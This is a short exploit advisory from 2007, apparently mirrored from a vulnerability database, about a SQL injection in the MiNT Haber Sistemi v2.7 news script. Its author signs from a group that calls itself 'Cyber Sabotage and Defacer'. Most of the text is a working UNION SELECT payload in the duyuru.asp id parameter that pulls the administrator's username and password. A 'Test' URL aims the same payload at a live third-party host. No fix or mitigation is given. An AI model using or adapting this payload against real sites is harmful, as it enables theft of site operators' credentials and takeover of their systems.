MiNT Haber Sistemi v2.7 (tr) == SQL Injection Vulnerability

2007-01-1300:00:00

vulners.com

###############################################################
#MiNT Haber Sistemi v2.7 (tr) == SQL Injection Vulnerability
#Author : chernobiLe
#Site : www.cyber-sabotage.org, www.chernobiLe.com<http://www.chernobile.com/>
#Contact: [email protected]
###############################################################
#Risk : High
#Download Link Of MiNT Haber Sistemi v2.7 :
http://www.aspindir.com/Goster/4539

#Exploit;
#Admin Nick, Passport, Mail;
http://[SITE]/duyuru.asp?id=6+union+select+0,kul_adi,sifre+from+uye+where+id=1<http://[site]/duyuru.asp?id=6+union+select+0,kul_adi,sifre+from+uye+where+id=1>

#Union data Text;
#Duyuru Basligi : USERNAME
#Duyuru Metni : PASSWORD

#Test :
http://www.denemesc.somee.com/haber27/duyuru.asp?id=6+union+select+0,kul_adi,sifre+from+uye+where+id=1

#Greetz: All CSDT ( Cyber Sabotage and Defacer ) TEAM

JSON

MiNT Haber Sistemi v2.7 &#40;tr&#41; == SQL Injection Vulnerability

MiNT Haber Sistemi v2.7 (tr) == SQL Injection Vulnerability